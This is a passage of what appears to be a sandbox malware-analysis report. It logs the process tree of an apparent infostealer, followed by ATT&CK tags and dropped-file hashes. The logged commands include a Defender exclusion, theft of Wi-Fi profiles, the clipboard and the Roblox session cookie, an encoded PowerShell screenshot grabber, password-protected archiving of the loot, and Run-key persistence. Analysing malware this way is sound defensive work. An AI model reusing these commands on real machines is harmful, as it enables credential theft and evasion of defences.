- Detects videocard installed
PID:1352 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe ""4⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\system32\attrib.exeattrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe "5⤵
- Views/modifies file attributes
PID:4172 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4872 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:2432 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:4756
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:2692
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵PID:788
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:3288
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:2020 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3016
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3908
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵PID:5064
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵PID:2428
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:2032
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:2936 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:1600
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:4912
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:3464
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4088 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\abavsymn\abavsymn.cmdline"6⤵PID:4204
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CA0.tmp" "c:\Users\Admin\AppData\Local\Temp\abavsymn\CSCD625BD24B259407088673FF6AA1ECEEF.TMP"7⤵PID:1600
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:1680
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4592
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:1296
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2388 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2272
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:1676
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:560
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:900 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:4880
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:1924 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4644
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:1756
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2100
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4836
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2984
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4912
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1212 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:2964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:360 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:3392
-
C:\Windows\system32\getmac.exegetmac5⤵PID:1476
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29042\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\3Y54U.zip" *"4⤵PID:4188
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI29042\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\3Y54U.zip" *5⤵
- Executes dropped EXE
PID:3160 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:5084
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:3748
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:3464
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:4608
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:4220
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:3956
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:3408
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵PID:4208
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:1456
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1888 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:4460
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:1216
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "c:\users\admin\appdata\local\temp\zyron.exe ""4⤵PID:4488
-
C:\Windows\system32\PING.EXEping localhost -n 35⤵
- Runs ping.exe
PID:4376 -
C:\Windows\Resources\Themes\icsys.icn.exeC:\Windows\Resources\Themes\icsys.icn.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3972 -
\??\c:\windows\resources\themes\explorer.exec:\windows\resources\themes\explorer.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4200 -
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe SE4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:676 -
\??\c:\windows\resources\svchost.exec:\windows\resources\svchost.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4736 -
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe PR6⤵
- Executes dropped EXE
PID:212
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5aa4f31835d07347297d35862c9045f4a
SHA183e728008935d30f98e5480fba4fbccf10cefb05
SHA25699c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0
SHA512ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5ceb8c5acbe548e524a4f326d132950d6
SHA1fa31e1fdf787d0808ba10445f197372501989130
SHA256acf029fbdc8bdd486f34435688424d68c2b0c6eb922ad9bbdaf3fc1548ba2864
SHA5126fef40637fa58d24e6b7dbcd6350748774eef2010d03dcd3297aef5cfb2b74c7dda0fcf576ce21dd9bb5a0269a451ee75d15861df8774da57f05aeafb4effef8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD558e649486d0f92b75a5b5b52ff9f7c60
SHA162ffe86b0f9238f4c63a5014e91996059c0cf535
SHA25677601ec289df13480448e34781bb2bbf8cd8d4df437b7be8009f04e11c9f0762
SHA5124eaa422ca92aa4f4b4a32c859041817b95063f52c1f918de649e242cdaaf685436dcb8dd980bf0c41d3a1a58ab157a848c7983e9994db92ae0f56b5deafa73e8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD557083a8e45ebe4fd84c7c0f137ec3e21
SHA1857b5ea57f7bcf03cadee122106c6e58792a9b84
SHA256f20102c4dc409cad3cdaf7a330c3a18a730a9d7d902b9fbee2a84186cba93d40
SHA5124bbc21c07c05ee1f783242f0fb59324d5ff9ae18bdf892f02980d582fed83380888eeba58e1a6a321507cfd5d4fe82a328a0d3482b29633be4e3ebbeac636f87
-
C:\Users\Admin\AppData\Local\Temp\RES8CA0.tmpFilesize
1KB
MD55f621d1435107f04da074b9250dfd048
SHA12a5ca5b4de160a9a46c1847db80efa084c7f63d0
SHA256409d11807cbab47a5fdd814ea4cca5d7a6d4925596054557e86fde526add0703
SHA512c0de613328d3679b070db83c14f1160c052bc1eb072f76b9effc90e2abcc769b3b367eda956029243f57699d66f6d4fce611d76d556788c7154581327a9bcbce
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\VCRUNTIME140.dllFilesize
116KB
MD5be8dbe2dc77ebe7f88f910c61aec691a
SHA1a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA2564d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA5120da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\_bz2.pydFilesize
48KB
MD52152fe099ca3e722a8b723ea26df66c6
SHA11daaaba933501949e5d0e3d3968f4279dcde617d
SHA25641eb95b13a115594ca40eacbb73b27233b7a8f40e9dbfbc597b9f64f0a06b485
SHA5125168f3c554ba8f6c1d923a047ca6784c106b56b8e1944113059190e2a9c19bd8722f14106ea7300ab222696e5164ee66d857b5d619328dd29bbb27943b073cf9
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\_ctypes.pydFilesize
59KB
MD51b06133298f03ff20e5d31cb3b0bca63
SHA10678e26f8d03e2ea0ba8d78d6d14809914d9c0a8
SHA256e92c373cc790a5411681a78ade2b75ecb03f3cf17aab7d98c0fb3afa2254684d
SHA51218c50a5ff69c0c7e19c27039eda0cade0e8bc8d617cca4bc8981dc8a519fa86a05a86b0662aaa493604e9801edf6a41ee65336332b715188e5e17a60a8154cbc
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\_decimal.pydFilesize
105KB
MD5a6102e46e07e1219f90392d1d89ac4d6
SHA1425375d377fde63532aa567978c58a1f131a41b1
SHA256572116a1ecdc809846f22d3ccd432326a7cff84969aa0de5a44e1fbe4c02bcf7
SHA51227bad2fd9b9953798b21602f942228aae6cec23cac1c160a45c4a321f1d0151ce245a82cceb65bfcd7412b212cb19e44fff3b045d7f3bedac49ff92d1c4affa6
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\_hashlib.pydFilesize
35KB
MD5ee8c405267c3baaa133e2e8d13b28893
SHA1b048112268f8300b3e47e441c346dea35e55d52a
SHA256462b55ca1a405cf11a20798cf38873a328d3720bbd9e46242ce40a5bc82f47d1
SHA512da290e352fa759414bbfa84d1c213be9c5722f5b43ab36ae72ea816e792a04e9aaa5253b935d6acdc34611f0ef17c2c0e8d181d014ce3cb117b5775e406f820a
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\_lzma.pydFilesize
86KB
MD5cf374ecc905c5694986c772d7fc15276
SHA1a0ee612388a1c68013f5e954e9280ba0db1bd223
SHA256d94c8b2004a570d0f3b1cfd0333e4b1a82696fe199a1614d9054f8bfef4ba044
